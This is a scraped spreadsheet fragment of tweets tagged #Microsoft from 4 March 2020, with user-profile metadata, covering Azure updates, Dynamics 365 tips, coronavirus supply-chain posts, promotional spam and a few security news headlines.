    <t>{'id': 1498745851, 'id_str': '1498745851', 'name': 'Rishi Gupta', 'screen_name': 'iamguptarishi', 'location': '', 'description': '#SharePoint #Office365 #Azure Developer/Architect. Proud father of one. Cricket lover, #explorer.', 'url': 'https://t.co/kgAzYZXbLo', 'entities': {'url': {'urls': [{'url': 'https://t.co/kgAzYZXbLo', 'expanded_url': 'http://iamguptarishi.wordpress.com', 'display_url': 'iamguptarishi.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 200, 'friends_count': 734, 'listed_count': 9, 'created_at': 'Mon Jun 10 16:36:10 +0000 2013', 'favourites_count': 1570, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 802,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'http://pbs.twimg.com/profile_images/1127621376326508550/2I-3_DLy_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1127621376326508550/2I-3_DLy_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1498745851/1547019493',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</si>
  <si>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06:31:59 +0000 2020</t>
  </si>
  <si>
    <t>Very useful tips to help you keep your Azure subscription clean #tips #azure #microsoft https://t.co/ARNsHUMjwj</t>
  </si>
  <si>
    <t>{'id': 274869655, 'id_str': '274869655', 'name': 'sindy', 'screen_name': 'sins26dec', 'location': 'Gauteng, Randburg', 'description': 'Love Life Worry Less Run More', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 137, 'friends_count': 744, 'listed_count': 2, 'created_at': 'Thu Mar 31 05:24:49 +0000 2011', 'favourites_count': 724, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1122,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'http://pbs.twimg.com/profile_images/1227940779693412357/_WbL70BH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227940779693412357/_WbL70BH_normal.jpg',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</si>
  <si>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06:27:53 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> NEWS  #fifthdomain #ProprietarySoftware #Microsoft #Windodws #TCO  A [cracker] group says it has major defense companies data https://t.co/tA4wuiOQpi</t>
  </si>
  <si>
    <t>Wed Mar 04 06:27:12 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Azure IoT Introduces seamless integration with Cisco IoT https://t.co/sH95VL4mii #Azure #IoT #Cisco #Devices #AzOps https://t.co/7IVoSjPROW</t>
  </si>
  <si>
    <t>{'id': 89009369, 'id_str': '89009369', 'name': 'James van den Berg â˜', 'screen_name': 'JamesvandenBerg', 'location': 'Noord-Holland, Laren', 'description': "I'm a MVP CDM Cloud and DataCenter Management. #Azure #Azuremonitor #AzureStack #Sysctr #Hyperv #Winserv #AzureDevOps #WindowsInsiders #WIMVP   My blogsite :", 'url': 'http://t.co/PJ94D0L68t', 'entities': {'url': {'urls': [{'url': 'http://t.co/PJ94D0L68t', 'expanded_url': 'http://mountainss.wordpress.com/', 'display_url': 'mountainss.wordpress.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6443, 'friends_count': 3173, 'listed_count': 705, 'created_at': 'Tue Nov 10 20:08:05 +0000 2009', 'favourites_count': 12618, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 29136, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'A4ECF5', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/861166087219683330/cqSMd_jS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/861166087219683330/cqSMd_jS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/89009369/1396048276', 'profile_link_color': '4F45E6', 'profile_sidebar_border_color': 'D9B17E', 'profile_sidebar_fill_color': 'F5F5C7', 'profile_text_color': '230D7A', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 06:25:15 +0000 2020</t>
  </si>
  <si>
    <t>*cracks* *sips* remember the good ol days when you could just put a game in and play it right out of the case?
.
.
.
#microsoft #xbox #steam #halo #haloce #pcgaming #classicgaming #videogames #boomer https://t.co/1Tlyo0yaT8 https://t.co/133VP3Xurw</t>
  </si>
  <si>
    <t>{'id': 1110209468376190978, 'id_str': '1110209468376190978', 'name': 'Nintendroid', 'screen_name': 'Nintendroid_', 'location': '', 'description': 'Nintendroidâ€™s low-key Twitter presence. Retro gaming gifs, articles, travel, reviews and more! Donâ€™t tell anyone about us.', 'url': 'https://t.co/nINWRwpjIi', 'entities': {'url': {'urls': [{'url': 'https://t.co/nINWRwpjIi', 'expanded_url': 'http://Nintendroid.org', 'display_url': 'Nintendroid.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 14, 'friends_count': 8, 'listed_count': 0, 'created_at': 'Mon Mar 25 15:58:58 +0000 2019', 'favourites_count': 26, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 235, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1110217649173221377/mlUOeNOT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1110217649173221377/mlUOeNOT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1110209468376190978/1553531496',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</si>
  <si>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06:23:18 +0000 2020</t>
  </si>
  <si>
    <t>Guy who named '#BlueKeep' #Windows flaw joins #Microsoft Threat Protection | ZDNet https://t.co/TLU8AhlhuG</t>
  </si>
  <si>
    <t>{'id': 91096542, 'id_str': '91096542', 'name': 'Mithun Sanghavi', 'screen_name': 'Mithun_Sanghavi', 'location': 'Pune, India', 'description': 'CEH, CISM PM @Wipro &amp; Trusted Advisor @Symantec Connect, #Symantec #ITSecurity #Cybersecurity #securityadvisor. Tweets and opinions expressed here are my own.', 'url': 'https://t.co/YG37S2V5EZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/YG37S2V5EZ', 'expanded_url': 'http://www.linkedin.com/in/mithunsanghavi', 'display_url': 'linkedin.com/in/mithunsanghâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 443, 'friends_count': 531, 'listed_count': 89, 'created_at': 'Thu Nov 19 12:39:25 +0000 2009', 'favourites_count': 1209, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 16231,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'http://pbs.twimg.com/profile_images/960827445481037824/Xkl1cmxi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/960827445481037824/Xkl1cmxi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/91096542/1400781970',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</si>
  <si>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06:20:15 +0000 2020</t>
  </si>
  <si>
    <t>Active Directory Security Checklist....
#microsoft #activedirectory #ad #Security #infosecurity #CyberSecurity #DomainAdmin https://t.co/P68ZV2mMbk</t>
  </si>
  <si>
    <t>{'id': 762522407169032193, 'id_str': '762522407169032193', 'name': 'John Burkett', 'screen_name': 'Mr_JBurkett', 'location': 'Illinois, USA', 'description': 'Information / Cyber Security Enthusiast, Technologist, Amateur Photographer, Dodgeball Prodigy &amp; 5th Grade won 2nd place ðŸ¥ˆ100yd Dash...#InfoSec #CyberSecurity', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2286, 'friends_count': 3782, 'listed_count': 36, 'created_at': 'Mon Aug 08 05:34:43 +0000 2016', 'favourites_count': 188, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2259,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'http://pbs.twimg.com/profile_images/859839318336131072/vNAxtDW8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/859839318336131072/vNAxtDW8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/762522407169032193/1507658310',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</si>
  <si>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06:20:02 +0000 2020</t>
  </si>
  <si>
    <t>Standard Bank partners with #Microsoft and #SAP to accelerate its digital journey https://t.co/RtpN4huq4L @SAPBanking @FalkRieker @KMcDSAP</t>
  </si>
  <si>
    <t>{'id': 1704032226, 'id_str': '1704032226', 'name': 'Karsten Egetoft', 'screen_name': 'KarstenEgetoft', 'location': 'Walldorf', 'description': 'Chief Solution Expert @SAP solution owner #FSDP Topics #SAPHANA #DataManagement, #BigData, #Innovation, Analytics, #DigitalTransformation - All views my own', 'url': 'https://t.co/Ex3R6uk1ky', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ex3R6uk1ky', 'expanded_url': 'http://www.linkedin.com/in/karstenegetoft', 'display_url': 'linkedin.com/in/karstenegetâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4185, 'friends_count': 4785, 'listed_count': 99, 'created_at': 'Tue Aug 27 08:07:04 +0000 2013', 'favourites_count': 3030, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6021,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'http://pbs.twimg.com/profile_images/591597915740758020/BqasZlfb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/591597915740758020/BqasZlfb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1704032226/1557499385',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</si>
  <si>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06:19:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Azure HDInsight and Azure Database for PostgreSQL news https://t.co/TRD5amoBbY #Azure #HDInsight #Database #PostgreSQL #AzOps https://t.co/7EyNZw2sI1</t>
  </si>
  <si>
    <t>Wed Mar 04 06:17:43 +0000 2020</t>
  </si>
  <si>
    <t>Kudos to #Microsoft #Windows team. My Intel based cheap tablet lagged terribly under Windows 10 year and half ago, while it worked nicely with Android 5. Today it is the opposite. Microsoft made great strides to make Windows 10 fluent on low end HW.</t>
  </si>
  <si>
    <t>{'id': 14867134, 'id_str': '14867134', 'name': 'bubnikv', 'screen_name': 'bubnikv', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 47, 'friends_count': 135, 'listed_count': 2, 'created_at': 'Thu May 22 11:15:21 +0000 2008', 'favourites_count': 45, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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</si>
  <si>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Mar 04 06:13:41 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Teams for Android updated with live captions support and more https://t.co/nJqFwuBDPt #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Mar 04 06:11:44 +0000 2020</t>
  </si>
  <si>
    <t>China stopped its economy.
Then the World moved its #SupplyChain
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Twitter #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping
https://t.co/WbKGhVvDbS</t>
  </si>
  <si>
    <t>Wed Mar 04 06:10:51 +0000 2020</t>
  </si>
  <si>
    <t>@Azure tip of the day:
#microsoft #MicrosoftAzure #Azure @SQLServer #linkedinlearning
https://t.co/mSsmS15ntH</t>
  </si>
  <si>
    <t>Wed Mar 04 06:08:55 +0000 2020</t>
  </si>
  <si>
    <t>Customer success stories #bui #capitecbank #teams #microsoft https://t.co/u1um4CFC3O</t>
  </si>
  <si>
    <t>Wed Mar 04 06:07:47 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft confirms Live Tiles will not go away, but your Windows 10 Start Menu will look better without them https://t.co/NZZZvDDfmj #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Mar 04 06:06:02 +0000 2020</t>
  </si>
  <si>
    <t>Google Chrome will finally let you view two PDF pages on one screen https://t.co/bXfenU1yun #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Mar 04 06:00:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is opening a new #Azure region in Spain and working with @Telefonica to build out their #AI -powered network to power Industry 4.0! https://t.co/c8ZbfSm8Yo</t>
  </si>
  <si>
    <t>Wed Mar 04 05:57:10 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for MariaDBPlanned maintenance notifications now in preview https://t.co/s7LacCOT4i #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Mar 04 05:57:08 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for MySQLPlanned maintenance notification now in preview https://t.co/12jiMAFtR7 #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Mar 04 05:53:24 +0000 2020</t>
  </si>
  <si>
    <t>How to get Dynamics 365 Annotation Attachment using Power Automate? #dynamics365 #dynamics365community #d365 #powerautomate #powerplatform #powerplatformcommunity #toronto #canada #microsoft #msflow https://t.co/LcarTYywFm https://t.co/TnslNXQwR2</t>
  </si>
  <si>
    <t>{'id': 117069836, 'id_str': '117069836', 'name': 'Cristall', 'screen_name': 'iamcristall', 'location': 'Toronto, Ontario', 'description': 'Best Practice Enthusiast, Dynamics 365 &amp; Power Platform Advocate, Scrum Master, Blogger, Teacher, Learner, Entrepreneur', 'url': 'https://t.co/Lmr5C1IGiB', 'entities': {'url': {'urls': [{'url': 'https://t.co/Lmr5C1IGiB', 'expanded_url': 'http://www.learntoinspire.ca', 'display_url': 'learntoinspire.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 57, 'friends_count': 167, 'listed_count': 2, 'created_at': 'Wed Feb 24 12:53:42 +0000 2010', 'favourites_count': 76, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 443,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'http://pbs.twimg.com/profile_images/1216129715586523136/nXEhUB30_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1216129715586523136/nXEhUB30_normal.jpg',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'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 05:51:35 +0000 2020</t>
  </si>
  <si>
    <t>Should you bet your #SupplyChain on China?
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Twitter #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/pob40TIqbL</t>
  </si>
  <si>
    <t>Wed Mar 04 05:51:05 +0000 2020</t>
  </si>
  <si>
    <t>Why #Microsoft and #Tesla are the decades big disrupters
Electric cars and the public cloud are set to tip the market and leave competitors scrambling
#electriccars #publiccloud #technology #innovation
#disruption
https://t.co/1bYkmenPJp</t>
  </si>
  <si>
    <t>{'id': 730431353372561408, 'id_str': '730431353372561408', 'name': 'rameshkotnana', 'screen_name': 'rameshkotnana1', 'location': 'Hyderabad, India', 'description': 'A passionate information professional with hungry for serving society with right information at right time. All tweets are personal.', 'url': 'https://t.co/2f0jHhtD1x', 'entities': {'url': {'urls': [{'url': 'https://t.co/2f0jHhtD1x', 'expanded_url': 'https://www.linkedin.com/in/ramesh-kotnana-90827727/', 'display_url': 'linkedin.com/in/ramesh-kotnâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 105, 'friends_count': 73, 'listed_count': 5, 'created_at': 'Wed May 11 16:16:20 +0000 2016', 'favourites_count': 649, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 11536,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'http://pbs.twimg.com/profile_images/730433587409870849/EVLmroUR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/730433587409870849/EVLmroUR_normal.jpg',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</si>
  <si>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05:46:00 +0000 2020</t>
  </si>
  <si>
    <t>Mastering #Office365 (2019) #udemyfree #udemycoupon =&amp;gt; https://t.co/oRe2tn2hjk
#Microsoft #OfficeProductivity #codinglife #Python #C #javascript #React #bootstrap #PHP #Nodejs #Angular #javascript30 #HTML5 #CSS #100DaysOfCode #udemy #Discounts</t>
  </si>
  <si>
    <t>{'id': 1143727050181599232, 'id_str': '1143727050181599232', 'name': 'Free Hipwee', 'screen_name': 'FreeHipwee', 'location': '', 'description': '100% Off udemy Coupon , Free Udemy Discount , Online Courses #udemy #discount #Development #business #IT #Software #designer #Marketing #PhotographyIslife #musi', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 239, 'friends_count': 160, 'listed_count': 2, 'created_at': 'Wed Jun 26 03:45:52 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 948, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1143734724977762304/i9HNUbp4_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1143734724977762304/i9HNUbp4_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1143727050181599232/1562818921',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</si>
  <si>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05:41:56 +0000 2020</t>
  </si>
  <si>
    <t>#JenniferLopez flaunts her flat midriff in knotted top and ,,, 
https://t.co/Nd2cC8n8i8  @DailyMailCeleb
#bigdata 
#Twitter #socialmedia
@Chidambara09 #linux #china #usa #google #youtube
#oracle #Microsoft #apple
#celebrity #model #actress #movies #pop #fashion    
#UK #WHO</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</si>
  <si>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927159,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</si>
  <si>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05:39:40 +0000 2020</t>
  </si>
  <si>
    <t>#apple #microsoft lead effort to kill rifle emoji in Unicode 9. #technologyintegration https://t.co/tAT568k0am https://t.co/WkevY0rCDf</t>
  </si>
  <si>
    <t>{'id': 752037990411694081, 'id_str': '752037990411694081', 'name': 'Amanda Keeley', 'screen_name': 'amandakeelley', 'location': 'Berkeley, CA', 'description': 'Techgirl', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4655, 'friends_count': 4523, 'listed_count': 34, 'created_at': 'Sun Jul 10 07:13:24 +0000 2016', 'favourites_count': 11533, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3391, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/784466439507968000/BTIPm8NA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/784466439507968000/BTIPm8NA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/752037990411694081/1475866309',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</si>
  <si>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05:38:55 +0000 2020</t>
  </si>
  <si>
    <t>Xi Jinping: Protect #Beijing at ALL cost.
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Twitter #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/ZQw8pHJWQo</t>
  </si>
  <si>
    <t>Wed Mar 04 05:36:24 +0000 2020</t>
  </si>
  <si>
    <t>Get help and support for windows for pc, imac.
help with choosing a #Microsoft product call us 24x7 support.
#TechSupport #RemoteSupport #Microsoftsupport #TechnicalSupport
For more info visit us: https://t.co/COLhL6eCkI https://t.co/AFsPB5V5TK</t>
  </si>
  <si>
    <t>{'id': 1185449940908040193, 'id_str': '1185449940908040193', 'name': 'Geekssupport', 'screen_name': 'Geekssupport1', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Sat Oct 19 06:57:55 +0000 2019', 'favourites_count': 0,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'http://pbs.twimg.com/profile_images/1186526231778361344/SuNqycFX_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1186526231778361344/SuNqycFX_normal.png',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</si>
  <si>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05:31:48 +0000 2020</t>
  </si>
  <si>
    <t>How to Import a Microsoft Excel file into Notion https://t.co/W8PimG65Fi #notion #notion.so #microsoft #tutorial #howto #excel #productivity</t>
  </si>
  <si>
    <t>{'id': 1153834873800593408, 'id_str': '1153834873800593408', 'name': 'Productive engineer', 'screen_name': 'Productiveengi1', 'location': '', 'description': 'A blog that covers how to use productivity apps to make your work easier', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 24, 'listed_count': 0, 'created_at': 'Wed Jul 24 01:10:45 +0000 2019', 'favourites_count': 12,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'http://pbs.twimg.com/profile_images/1153835689378820101/RDVAp5cO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153835689378820101/RDVAp5cO_normal.jpg',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</si>
  <si>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05:30:13 +0000 2020</t>
  </si>
  <si>
    <t>Guy who named 'BlueKeep' #Windows #flaw joins #Microsoft Threat Protection https://t.co/OA5fyzGcwU #HITB</t>
  </si>
  <si>
    <t>Wed Mar 04 05:26:45 +0000 2020</t>
  </si>
  <si>
    <t>Marketing CRM by Dynamics 365 helps you automate your business marketing and manage promotional campaigns with ease. 
Know more about Marketing CRM - https://t.co/ifrdFq7MhJ
#solzit #MarketingCRM #MicrosoftDynamics365 #Microsoft #Soluzione https://t.co/8S6TJBFlOs</t>
  </si>
  <si>
    <t>Wed Mar 04 05:26:18 +0000 2020</t>
  </si>
  <si>
    <t>Marketing CRM by Dynamics 365 helps you automate your business marketing and manage promotional campaigns with ease. 
Know more about Marketing CRM - https://t.co/OAMEI97cbQ
#solzit #MarketingCRM #MicrosoftDynamics365 #Microsoft #Soluzione https://t.co/7JjVF6gp7G</t>
  </si>
  <si>
    <t>{'id': 821223957483425792, 'id_str': '821223957483425792', 'name': 'Soluzione CRM', 'screen_name': 'CrmSoluzione', 'location': 'Bhopal, India', 'description': 'Soluzione is a Microsoft Gold Partner and Microsoft Certified Software Advisor for Microsoft Dynamics CRM.', 'url': 'https://t.co/1xPf7iDI3y', 'entities': {'url': {'urls': [{'url': 'https://t.co/1xPf7iDI3y', 'expanded_url': 'http://solzit.com/crm-consulting/', 'display_url': 'solzit.com/crm-consulting/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 256, 'listed_count': 0, 'created_at': 'Tue Jan 17 05:13:43 +0000 2017', 'favourites_count': 17, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 336, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/824238470449266689/yRu3TWJD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/824238470449266689/yRu3TWJD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/821223957483425792/1485348858',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</si>
  <si>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05:25:50 +0000 2020</t>
  </si>
  <si>
    <t>How to Open a Quick Create Phone Call through a Custom Ribbon Button? #dynamics365 #toronto #dynamics365community #powerplatform #ribbonworkbench #msdynamics #microsoft #dynamics365javascript https://t.co/7BdZaV3cHn https://t.co/KnqsF1VWrV</t>
  </si>
  <si>
    <t>Wed Mar 04 05:17:33 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Azure Tutorial for Beginners: Learn #Microsoft Azure step by step with practical examples. https://t.co/nDs07xmoEp
#BesantTechnologies #azure #cloud #aws #microsoft https://t.co/bu59dzQZsB</t>
  </si>
  <si>
    <t>{'id': 416930113, 'id_str': '416930113', 'name': 'Besant Technologies', 'screen_name': 'besanttech', 'location': 'Chennai', 'description': 'Besant Technologies is a leading Classroom and Online professional training provider on AWS, Data Science, Python, RPA &amp; 250 other top trending technologies.', 'url': 'https://t.co/QTcWHqfjt7', 'entities': {'url': {'urls': [{'url': 'https://t.co/QTcWHqfjt7', 'expanded_url': 'http://www.besanttechnologies.com', 'display_url': 'besanttechnologies.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 537, 'friends_count': 454, 'listed_count': 24, 'created_at': 'Sun Nov 20 09:30:40 +0000 2011', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3767,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'http://pbs.twimg.com/profile_images/954643984110022656/AGaxDpCy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/954643984110022656/AGaxDpCy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/416930113/1574515612',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</si>
  <si>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05:14:56 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for MySQLPlanned maintenance notification now in preview  https://t.co/88HoXNchRF  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Azure Database for MariaDBPlanned maintenance notifications now in preview  https://t.co/lU8P7eDHTY  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Wed Mar 04 05:13:02 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/9XzBnHRQPB
#1 4K HDR Media Player for Windows 10 (PC/Tablet) 2020
https://t.co/75eu9KPNhk
https://t.co/U45RO5Je8g
https://t.co/6WgJC8gbAm
#iamintel #intel #windows10 #microsoft #android #mobile #ios #iphone #ipad #tablet #cnxplayer #app #hdr #10bit #4k #fullhd https://t.co/xKCcxztS9v</t>
  </si>
  <si>
    <t>Wed Mar 04 05:12:14 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for MySQLPlanned maintenance notification now in preview  https://t.co/88HoXNchRF   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Azure Database for MariaDBPlanned maintenance notifications now in preview  https://t.co/lU8P7eDHTY   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Wed Mar 04 05:11:01 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #astroturfing slowed down by #coronavirus https://t.co/Sdph6JikQP</t>
  </si>
  <si>
    <t>Wed Mar 04 05:10:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Azure Database for MySQLPlanned maintenance notification now in preview https://t.co/nRLKfMllEt</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Azure Database for MariaDBPlanned maintenance notifications now in preview https://t.co/o8yUY0ZZvQ</t>
  </si>
  <si>
    <t>Wed Mar 04 05:10:13 +0000 2020</t>
  </si>
  <si>
    <t>Bot is short for roBOT and Bots are rapidly making a substantial impact in the way we do business. More: https://t.co/UiHpuC3Gxe
#microsoft #bot #focusband https://t.co/mx0sImKCsA</t>
  </si>
  <si>
    <t>{'id': 246557980, 'id_str': '246557980', 'name': 'FocusBand', 'screen_name': 'FocusBand', 'location': 'Brisbane, AUSTRALIA', 'description': 'Validates athlete performance process with brain data thatâ€™s viewed on a mobile for: Sports, Business &amp; LifeStyle', 'url': 'https://t.co/ATBf6fvax0', 'entities': {'url': {'urls': [{'url': 'https://t.co/ATBf6fvax0', 'expanded_url': 'http://www.focusband.com', 'display_url': 'focusband.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1934, 'friends_count': 794, 'listed_count': 18, 'created_at': 'Thu Feb 03 00:44:26 +0000 2011', 'favourites_count': 405, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9330,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'http://pbs.twimg.com/profile_images/1107932660372955138/wJ_Vu2xo_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1107932660372955138/wJ_Vu2xo_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/246557980/1573196279',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</si>
  <si>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Mar 04 05:09:10 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for MariaDBPlanned maintenance notifications now in preview: https://t.co/PSLrSl16IY #Azure #Microsoft</t>
  </si>
  <si>
    <t>Azure Database for MySQLPlanned maintenance notification now in preview: https://t.co/NdP1TL577q #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 05:05:01 +0000 2020</t>
  </si>
  <si>
    <t>#Azure HDInsight and Azure Database for PostgreSQL news https://t.co/o6eonSAzvA #cloud #microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 05:03:26 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for MySQLPlanned maintenance notification now in preview https://t.co/8vu9N0wWbe  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Azure Database for MariaDBPlanned maintenance notifications now in preview https://t.co/vSM2oiPex4  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Wed Mar 04 05:00:48 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft execs say in 20 years we'll all have digital assistants that will be our alter egos  and we need to set ground rules while we still can.. continue reading: https://t.co/T5VTHKUaK7 #Focusband  #havening  #microsoft https://t.co/el911AHiEN</t>
  </si>
  <si>
    <t>Wed Mar 04 05:00:04 +0000 2020</t>
  </si>
  <si>
    <t>#DUCA Financial Services Credit Union see up to 40% #revenue gains with on-demand, personalized videos powered by the #Microsoft #Azure #cloud - #Canada #BlueRush Larry Lubin @ArthurKrzycki Rielle Ullberg https://t.co/AgvxeZM5rv #MSFTAdvocate</t>
  </si>
  <si>
    <t>Wed Mar 04 04:57:52 +0000 2020</t>
  </si>
  <si>
